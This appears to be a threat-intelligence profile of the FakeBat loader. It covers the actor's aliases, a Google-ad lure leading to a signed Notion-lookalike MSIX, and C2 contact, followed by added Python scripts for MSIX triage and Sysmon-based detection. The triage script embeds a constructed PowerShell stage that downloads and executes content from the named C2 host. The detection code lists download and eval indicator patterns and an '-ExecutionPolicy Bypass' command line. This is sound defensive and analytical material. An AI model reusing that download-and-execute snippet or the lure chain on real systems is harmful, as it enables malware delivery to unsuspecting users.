| FakeBat | |
|---|---|
| Additional names | EugenLoader, Eugenfest, PaykLoader, Festik, Payk_34 and M1rages |
| Type of malware | Loader (dropper) |
| Date of initial activity | 2017 |
| Associated groups | APOTHECARY SPIDER, Storm-1113 |
| Motivation | Used to deliver other malware |
| Attack vectors | FakeBat (EugenLoader) is packaged in Microsoft installers (MSI or MSIX) distributed via social-engineering lures, most commonly malicious ads (malvertising) on Google. |
| Targeted systems | Microsoft Windows |
Overview
FakeBat (EugenLoader) is a malware loader packaged in Microsoft installers (MSI or MSIX) and distributed through social-engineering lures, most commonly malicious ads (malvertising) on Google. The installers, often large, conceal a malicious PowerShell script that contacts the attacker's infrastructure and retrieves a follow-up payload.
FakeBat is marketed under the handle “Eugenfest” on the Exploit cybercrime forum and was also advertised on the XSS forum under the pseudonym “Payk_34.” Eugenfest’s online activity can be traced back to 2017 on Russian-language carding and hacking forums under various aliases, including Festik, Payk_34, and M1rages (see appendix for list).
The actor previously ran an eBay fraud shop at fest-bay[.]com, stocked with stolen credentials obtained through brute-force attacks against the service. Fest-Bay was promoted on various carding forums and Telegram channels.
Targets
Primarily targets Microsoft Windows systems in Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Moldova, and Tajikistan.
How they operate
Distribution (Google ad → phishing site → MSIX → PowerShell)
The infection chain starts with a malicious ad returned for a Google search for Notion, the popular note-taking and productivity application. The ad displays Notion's real domain, notion.so, so it looks legitimate, but clicking it redirects to a lookalike site hosted at notilion[.]co.
Clicking the “Download for Windows” button requests an MSIX file named Notion-x86.msix. The package is signed under the name Forth View Designs Ltd., so the signature looks legitimate; Windows requires MSIX packages to be signed by a trusted certificate before they will install, so a valid signature also removes the warning a user might otherwise see.
The final step in the delivery chain is launching the MSIX installer. The victim sees an ordinary install prompt, but a malicious PowerShell script embedded in the package runs when the installer executes and stages the malicious payload.
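As an added example (not code from the original page or from any FakeBat analysis), the script below performs a static triage of an MSIX package of the kind described above. An MSIX is a ZIP archive; when it bundles the Package Support Framework (PSF), a config.json can point PsfLauncher at a PowerShell script that runs when the app starts, which is one way an installer can carry such a script. The package built in memory here is a constructed stand-in: the manifest, the config.json, the script text and the hostname it contains are made up for the illustration, and a real sample's script would normally be obfuscated, so the indicator scan is a first pass, not a verdict.

```python
"""Static triage of an MSIX package for a PSF-launched PowerShell script.

Added example, not from the original page. The MSIX layout, PSF config and
script below are constructed for illustration.
"""
import io
import json
import re
import xml.etree.ElementTree as ET
import zipfile

APPX_NS = "{http://schemas.microsoft.com/appx/manifest/foundation/windows10}"

# Constructed manifest; the publisher string mirrors the signer named on the page.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">
  <Identity Name="Notion" Publisher="CN=Forth View Designs Ltd" Version="1.0.0.0"/>
</Package>"""

# Constructed PSF configuration: runs a script before the packaged app starts.
SAMPLE_CONFIG = json.dumps({"applications": [{
    "id": "App",
    "executable": "PsfLauncher64.exe",
    "startScript": {"scriptPath": "StartingScriptWrapper.ps1", "showWindow": False},
}]})

# Constructed PowerShell stage (not the real FakeBat script, which is obfuscated).
SAMPLE_SCRIPT = r"""$u = 'http://utm-adrooz.com/get?id=' + $env:COMPUTERNAME
$r = Invoke-WebRequest -Uri $u -UseBasicParsing
Invoke-Expression $r.Content
"""

INDICATORS = {
    "web_request": re.compile(r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|DownloadString", re.I),
    "eval": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "encoded": re.compile(r"FromBase64String|-EncodedCommand", re.I),
}
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?[^\s'\"]*")


def build_sample_msix(with_script: bool = True) -> bytes:
    """Build an in-memory MSIX-like archive; with_script=False gives a benign layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AppxManifest.xml", SAMPLE_MANIFEST)
        z.writestr("Notion.exe", b"MZ" + b"\x00" * 64)  # placeholder decoy binary
        if with_script:
            z.writestr("config.json", SAMPLE_CONFIG)
            z.writestr("StartingScriptWrapper.ps1", SAMPLE_SCRIPT)
    return buf.getvalue()


def triage_msix(data: bytes) -> dict:
    """Return identity, PSF start script, embedded .ps1 files, indicators and hosts."""
    f = {"name": None, "publisher": None, "psf_start_script": None,
         "scripts": [], "indicators": {}, "hosts": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "AppxManifest.xml" in names:
            ident = ET.fromstring(z.read("AppxManifest.xml")).find(APPX_NS + "Identity")
            if ident is not None:
                f["name"], f["publisher"] = ident.get("Name"), ident.get("Publisher")
        # Any config.json in the package may be a PSF configuration with a start script.
        for n in names:
            if n.lower().endswith("config.json"):
                try:
                    cfg = json.loads(z.read(n))
                except ValueError:
                    continue
                apps = cfg.get("applications", []) if isinstance(cfg, dict) else []
                for app in apps:
                    start = app.get("startScript") or {}
                    if isinstance(start, dict) and start.get("scriptPath"):
                        f["psf_start_script"] = start["scriptPath"]
        # Scan every embedded PowerShell script for download/eval patterns and URLs.
        for n in names:
            if n.lower().endswith(".ps1"):
                text = z.read(n).decode("utf-8", errors="replace")
                f["scripts"].append(n)
                hits = [k for k, rx in INDICATORS.items() if rx.search(text)]
                if hits:
                    f["indicators"][n] = hits
                for url in URL_RE.findall(text):
                    host = url.split("//", 1)[1].split("/", 1)[0].split(":")[0]
                    if host not in f["hosts"]:
                        f["hosts"].append(host)
    # A PSF start script that downloads and evaluates content is the pattern to escalate.
    f["verdict"] = "suspicious" if f["psf_start_script"] and f["indicators"] else "clean"
    return f


if __name__ == "__main__":
    for k, v in triage_msix(build_sample_msix()).items():
        print(f"{k}: {v}")
```

The hosts list gives the analyst the domains to pivot on (passive DNS, WHOIS, block lists) before detonating anything; the publisher string comes from the manifest, not from the signature itself, so verifying the certificate chain is a separate step on a Windows host.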
Post Infection Traffic
The PowerShell script connects to FakeBat’s command-and-control (C2) server at utm-adrooz[.]com. The C2’s response determines what happens next, in particular whether a follow-up payload is served to this victim.
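As an added example (not from the original page or from any FakeBat detection content), the following host-side detection looks for the execution step just described: a PowerShell process started by an MSIX-installed application, followed by that same process resolving an external host. The events are constructed in Sysmon's field vocabulary (EventID 1 for process creation, EventID 22 for DNS queries); the GUIDs, paths and package folder name are made up. The rule assumes that MSIX applications install under C:\Program Files\WindowsApps, so a PowerShell process whose parent image or script path lies in that tree is unusual on most hosts.

```python
"""Correlate process-creation and DNS events to catch an MSIX-launched
PowerShell stage calling out to its C2.

Added example, not from the original page. Events are constructed; only the
field names follow Sysmon. Assumption: packaged apps live under WindowsApps.
"""
import re

WINDOWSAPPS = re.compile(r"\\Program Files\\WindowsApps\\", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PKG = r"C:\Program Files\WindowsApps\Notion_1.0.0.0_x86__abc123xyz"  # made-up package folder

# Constructed event stream: one MSIX-launched PowerShell ({C3}) and one benign
# interactive PowerShell ({D4}) for contrast.
EVENTS = [
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": PKG + r"\PsfLauncher64.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "PsfLauncher64.exe"},
    {"EventID": 1, "ProcessGuid": "{C3}", "Image": PS,
     "ParentImage": PKG + r"\PsfLauncher64.exe",
     "CommandLine": 'powershell.exe -ExecutionPolicy Bypass -file "' + PKG + r'\StartingScriptWrapper.ps1"'},
    {"EventID": 22, "ProcessGuid": "{C3}", "Image": PS, "QueryName": "utm-adrooz.com"},
    {"EventID": 1, "ProcessGuid": "{D4}", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe -NoProfile"},
    {"EventID": 22, "ProcessGuid": "{D4}", "Image": PS, "QueryName": "www.microsoft.com"},
]


def detect_msix_powershell(events):
    """Return {ProcessGuid: details} for PowerShell processes tied to a WindowsApps
    package, with every DNS name the same process later resolved."""
    suspects = {}
    # Pass 1: PowerShell whose parent or script path is inside a packaged app.
    for e in events:
        if e["EventID"] != 1 or not POWERSHELL.search(e["Image"]):
            continue
        if WINDOWSAPPS.search(e.get("ParentImage", "")) or WINDOWSAPPS.search(e.get("CommandLine", "")):
            suspects[e["ProcessGuid"]] = {"parent": e["ParentImage"],
                                          "command_line": e["CommandLine"], "dns": []}
    # Pass 2: attach DNS lookups made by those processes (the C2 contact).
    for e in events:
        if e["EventID"] == 22 and e["ProcessGuid"] in suspects:
            suspects[e["ProcessGuid"]]["dns"].append(e["QueryName"])
    return suspects


def format_alerts(suspects):
    """One alert line per suspect process, listing the hosts it resolved."""
    return [f"MSIX-launched PowerShell {guid}: parent={d['parent']} dns={','.join(d['dns']) or '-'}"
            for guid, d in suspects.items()]


if __name__ == "__main__":
    for line in format_alerts(detect_msix_powershell(EVENTS)):
        print(line)
```

Keying the correlation on ProcessGuid rather than on the image path is what separates the packaged-app launch from ordinary administrative PowerShell on the same host; the DNS name list is then the pivot into proxy and firewall logs for the follow-up payload download.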